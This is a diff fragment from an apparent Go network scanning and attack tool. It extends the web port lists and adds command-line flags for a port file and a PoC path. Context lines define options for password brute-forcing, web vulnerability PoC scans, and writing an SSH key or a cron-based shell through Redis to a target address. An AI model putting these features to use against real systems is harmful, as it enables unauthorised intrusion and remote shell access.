var Webport = "80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880"
|
||||
var Webport = "80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880"
|
||||
var DefaultPorts = "21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017"
|
||||
|
||||
type HostInfo struct {
|
||||
|
@ -92,6 +94,8 @@ var (
|
|||
Userfile string
|
||||
Passfile string
|
||||
HostFile string
|
||||
PortFile string
|
||||
PocPath string
|
||||
Threads int
|
||||
URL string
|
||||
UrlFile string
|
||||
|
|
|
@ -38,10 +38,13 @@ func Flag(Info *HostInfo) {
|
|||
flag.StringVar(&HostFile, "hf", "", "host file, -hf ip.txt")
|
||||
flag.StringVar(&Userfile, "userf", "", "username file")
|
||||
flag.StringVar(&Passfile, "pwdf", "", "password file")
|
||||
flag.StringVar(&PortFile, "portf", "", "Port File")
|
||||
flag.StringVar(&PocPath, "pocpath", "", "Port File")
|
||||
flag.StringVar(&RedisFile, "rf", "", "redis file to write sshkey file (as: -rf id_rsa.pub) ")
|
||||
flag.StringVar(&RedisShell, "rs", "", "redis shell to write cron file (as: -rs 192.168.1.1:6666) ")
|
||||
flag.BoolVar(&IsWebCan, "nopoc", false, "not to scan web vul")
|
||||
flag.BoolVar(&IsBrute, "nobr", false, "not to Brute password")
|
||||
flag.IntVar(&BruteThread, "br", 1, "Brute threads")
|
||||
flag.BoolVar(&IsPing, "np", false, "not to ping")
|
||||
flag.BoolVar(&Ping, "ping", false, "using ping replace icmp")
|
||||
flag.StringVar(&TmpOutputfile, "o", "result.txt", "Outputfile")
|
||||
|
|
Loading…
Reference in New Issue